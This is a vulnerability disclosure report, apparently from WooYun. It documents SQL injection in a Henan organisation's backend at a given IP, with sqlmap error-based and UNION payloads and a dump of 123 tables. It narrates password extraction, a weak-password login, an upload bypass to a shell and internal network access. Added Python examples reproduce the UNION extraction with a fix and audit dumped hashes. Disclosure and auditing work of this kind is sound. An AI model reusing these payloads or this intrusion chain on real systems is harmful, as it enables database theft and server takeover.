WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles online --------------------------- http://drop.zone.ci/
2015-01-28: Details sent to the vendor, awaiting vendor handling
2015-02-02: Vendor confirmed; details disclosed to the vendor only
2015-02-12: Details disclosed to core white hats and experts in the relevant field
2015-02-22: Details disclosed to regular white hats
2015-03-04: Details disclosed to intern white hats
2015-03-14: Details disclosed to the public
get me big
Login address: http://218.28.234.10/
The backend has a POST injection, plus several other injection points.
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: opID
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: opID=forgetPsw' AND (SELECT 2629 FROM(SELECT COUNT(*),CONCAT(0x3a767a743a,(SELECT (CASE WHEN (2629=2629) THEN 1 ELSE 0 END)),0x3a6461773a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Dyxr'='Dyxr&user=1

    Type: UNION query
    Title: MySQL UNION query (NULL) - 12 columns
    Payload: opID=forgetPsw' LIMIT 1,1 UNION ALL SELECT 66, 66, 66, 66, 66, 66, 66, CONCAT(0x3a767a743a,0x4d766e4a477265616a78,0x3a6461773a), 66, 66, 66, 66#&user=1
---
Database: loms_v4_henan
[123 tables]
+-------------------------------------+
| afs_cars                            |
| afs_reception_apply                 |
| afs_sendcar_apply                   |
| atd_law_holiday                     |
| atd_leave_apply                     |
| atd_work_status_log                 |
| aw_accessory                        |
| aw_accessory_apply_detail           |
| aw_warehouse                        |
| aw_warehouse_accessory_apply        |
| aw_warehouse_reserve                |
| dss_favorite                        |
| dss_favoritetype                    |
| dss_sys_region                      |
| fa_asset_process_history            |
| fa_fixed_asset_apply                |
| fa_fixed_asset_detail               |
| fa_fixed_asset_item                 |
| fa_office_supplies_apply            |
| fa_office_supplies_item             |
| flack_biz                           |
| oa_address_book                     |
| oa_file                             |
| oa_file_type                        |
| oa_from_doc                         |
| oa_linkman                          |
| oa_memo                             |
| oa_news                             |
| oa_notice                           |
| oa_notice_reply                     |
| oa_notice_right                     |
| oa_notice_user                      |
| oa_schedule                         |
| oa_to_doc                           |
| oa_work_log                         |
| process_archive_rights              |
| process_archives                    |
| process_finish_tasks                |
| process_instances                   |
| process_nodes                       |
| process_transitions                 |
| process_wait_tasks                  |
| sms_mo_daily                        |
| sms_mo_his                          |
| sms_mt_daily                        |
| sms_mt_his                          |
| sms_mt_temp                         |
| ss_article                          |
| ss_article_item                     |
| ss_article_provide                  |
| ss_article_receive                  |
| ss_info                             |
| ss_message                          |
| ss_msg_feedback                     |
| ss_perambulate                      |
| ss_perambulate_his                  |
| ss_perambulate_sign                 |
| ss_query                            |
| ss_query_question                   |
| ss_query_questionanswer             |
| ss_query_response                   |
| ss_service_case                     |
| ss_service_result                   |
| ss_ticket_cancel                    |
| sys_attach_group                    |
| sys_attach_option                   |
| sys_attachment                      |
| sys_comm_configure                  |
| sys_common_option                   |
| sys_data_area                       |
| sys_datadict                        |
| sys_datatype                        |
| sys_department                      |
| sys_editable_columns                |
| sys_free_space                      |
| sys_log                             |
| sys_maintain_user                   |
| sys_menu                            |
| sys_message_from                    |
| sys_message_to                      |
| sys_parameter                       |
| sys_region                          |
| sys_region_group                    |
| sys_region_right                    |
| sys_right                           |
| sys_role                            |
| sys_seal                            |
| sys_sign                            |
| sys_system                          |
| sys_user                            |
| sys_user_roles                      |
| sys_user_system                     |
| task_center_month_plan              |
| task_center_year_plan               |
| task_context                        |
| task_daily_task                     |
| task_dept_month_plan                |
| task_dept_month_task                |
| task_dept_year_plan                 |
| task_week_plan                      |
| teaching_material                   |
| tms_marketer_training               |
| tms_praise_punish                   |
| tms_station                         |
| tms_station_addressmove             |
| tms_station_apply                   |
| tms_station_cancel                  |
| tms_station_cancelticket            |
| tms_station_change                  |
| tms_station_jxlbak_20120906         |
| tms_station_machine                 |
| tms_station_machine_jxlbak_20120906 |
| tms_station_map                     |
| tms_station_map_jxlbak_20120906     |
| tms_station_marketer                |
| tms_station_master                  |
| tms_station_master_bak              |
| tms_station_master_jxlbak_20120906  |
| tms_station_openclose               |
| tms_station_relexsale               |
| tms_station_type                    |
| work_employee                       |
| work_meeting                        |
+-------------------------------------+
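The sqlmap output above only shows the payloads, not the query they land in. The following is an added example, not code from the report or from the affected system, that reconstructs the bug shape those payloads imply (the POST field opID spliced into a quoted literal, user spliced in unquoted) and runs a UNION extraction against it in an in-memory SQLite database. Everything about the schema (a three-column sys_operation lookup, a sys_user table with username/password columns) is assumed; the table name sys_user is the only thing borrowed from the listing. The report's payload is 12 columns wide and uses MySQL syntax; here it is cut to 3 columns and rewritten in SQLite syntax (|| instead of CONCAT, a "-- " comment instead of "#"). The markers are the report's own: 0x3a767a743a decodes to ":vzt:" and 0x3a6461773a to ":daw:", which is how sqlmap finds its value in the response. The error-based FLOOR(RAND(0)*2) GROUP BY trick in the first payload is MySQL-specific and is not reproduced.

```python
import hashlib
import sqlite3


def md5hex(pw):
    return hashlib.md5(pw.encode()).hexdigest()


# Constructed sample rows (not from the report). Unsalted MD5 is an assumption.
SAMPLE_USERS = [
    (1, "admin", md5hex("password")),
    (2, "test", md5hex("888888")),
]

# sqlmap brackets each extracted value with random markers; these two are the
# decoded hex constants from the report's payloads.
MARK_START = ":vzt:"   # 0x3a767a743a
MARK_END = ":daw:"     # 0x3a6461773a

# UNION payload in SQLite syntax, matched to the 3-column query in
# lookup_vulnerable (the real target needed 12 columns).
UNION_PAYLOAD = (
    "forgetPsw' UNION ALL SELECT "
    f"'{MARK_START}' || username || ':' || password || '{MARK_END}', NULL, NULL "
    "FROM sys_user-- "
)


def make_db():
    """In-memory stand-in for the backend's MySQL database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sys_user (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO sys_user VALUES (?, ?, ?)", SAMPLE_USERS)
    conn.execute("CREATE TABLE sys_operation (opID TEXT, user INTEGER, label TEXT)")
    conn.execute("INSERT INTO sys_operation VALUES ('forgetPsw', 1, 'reset password')")
    conn.commit()
    return conn


def lookup_vulnerable(conn, op_id, user):
    """Assumed shape of the vulnerable handler: both POST fields are pasted
    into the SQL text, which is exactly what the sqlmap payloads rely on."""
    sql = (
        "SELECT opID, user, label FROM sys_operation "
        f"WHERE opID = '{op_id}' AND user = {user}"
    )
    return list(conn.execute(sql))


def lookup_fixed(conn, op_id, user):
    """Same lookup with bound parameters: the payload becomes an unmatched
    opID value and the numeric field is validated before it reaches SQL."""
    try:
        user_id = int(user)
    except ValueError:
        return []  # reject a non-numeric user id instead of splicing it in
    sql = "SELECT opID, user, label FROM sys_operation WHERE opID = ? AND user = ?"
    return list(conn.execute(sql, (op_id, user_id)))


def extract_marked(rows, start=MARK_START, end=MARK_END):
    """Pull the marker-delimited values out of the result rows, sqlmap-style."""
    found = []
    for row in rows:
        for cell in row:
            if isinstance(cell, str) and cell.startswith(start) and cell.endswith(end):
                found.append(cell[len(start):-len(end)])
    return found


def dump_users_via_union(conn):
    """What one request with the UNION payload yields against the vulnerable lookup."""
    return extract_marked(lookup_vulnerable(conn, UNION_PAYLOAD, "1"))


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "forgetPsw", "1"))   # the legitimate row
    print(dump_users_via_union(db))                  # username:hash for every user
    print(lookup_fixed(db, UNION_PAYLOAD, "1"))      # [] with bound parameters
```

The generated vulnerable statement ends in `FROM sys_user-- ' AND user = 1`, so the original `AND user = 1` clause is commented away and the UNION appends one row per account to the legitimate result, which is the same mechanism as the report's `#&user=1` tail. The fixed version does not need to know anything about the payload: with placeholders the quote is data, and the `int()` check on user closes the unquoted numeric splice that a second payload could target.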
Dumped passwords for roughly 500+ accounts.
I tried one at random; as it happened, sqlmap on my Windows box is awkward with Chinese. There was a test user whose password was still the weak 888888; after logging in, reports and everything else could be downloaded.
From here, tamper with the upload request (modify the packet) to upload.
Got a shell. Internal network plus administrators; you know the rest.
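The report found the weak password by trying one account by hand. The following is an added example, not from the report, of the check an auditor would run over the whole dumped account table instead: a reverse lookup of every hash against a wordlist, plus a grouping of hashes that several accounts share, which with unsalted hashing exposes default or copied passwords even when they are not in the wordlist. The dump rows, the wordlist and the use of unsalted MD5 are all constructed assumptions; the report does not say how the application stores passwords.

```python
import hashlib
from collections import Counter


def md5hex(pw):
    return hashlib.md5(pw.encode()).hexdigest()


# Constructed dump in the shape (username, password hash). The report's real
# dump (~500 rows) is not reproduced; unsalted MD5 is an assumption.
DUMPED_USERS = [
    ("admin", md5hex("Zk7!pq2Lw")),
    ("test", md5hex("888888")),
    ("zhang3", md5hex("123456")),
    ("li4", md5hex("888888")),
    ("wang5", md5hex("888888")),
    ("zhao6", md5hex("T9r#mx41")),
]

# Constructed short wordlist; a real audit uses a full one.
WEAK_PASSWORDS = ["123456", "888888", "111111", "password", "admin"]


def find_weak(dumped, wordlist):
    """Hash each candidate once, then match every dumped hash against that table.
    Returns (username, recovered password) pairs in dump order."""
    table = {md5hex(p): p for p in wordlist}
    return [(user, table[h.lower()]) for user, h in dumped if h.lower() in table]


def shared_hashes(dumped, min_users=2):
    """Group accounts by identical hash. With unsalted hashing, a hash used by
    several accounts is a shared password (typically a default one) whether or
    not the wordlist contains it."""
    counts = Counter(h.lower() for _, h in dumped)
    groups = {}
    for user, h in dumped:
        if counts[h.lower()] >= min_users:
            groups.setdefault(h.lower(), []).append(user)
    return groups


if __name__ == "__main__":
    for user, pw in find_weak(DUMPED_USERS, WEAK_PASSWORDS):
        print(f"weak password: {user} -> {pw}")
    for h, users in shared_hashes(DUMPED_USERS).items():
        print(f"shared hash {h}: {', '.join(users)}")
```

The wordlist lookup costs one hash per candidate regardless of how many accounts are in the dump, so it stays cheap at 500 rows or 500,000. The shared-hash grouping is the part worth keeping even after passwords are reset: three accounts on the same hash after a "fix" means the reset handed out one default again.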
Please fix the SQL injection and the large number of weak passwords; requesting 20 RANK, thanks.
Severity: High
Vulnerability Rank: 12
Confirmation time: 2015-02-02 08:28
CNVD has confirmed and reproduced the described situation, and has forwarded it via CNCERT to the Henan branch center, which will coordinate handling with the website's operating unit.
None yet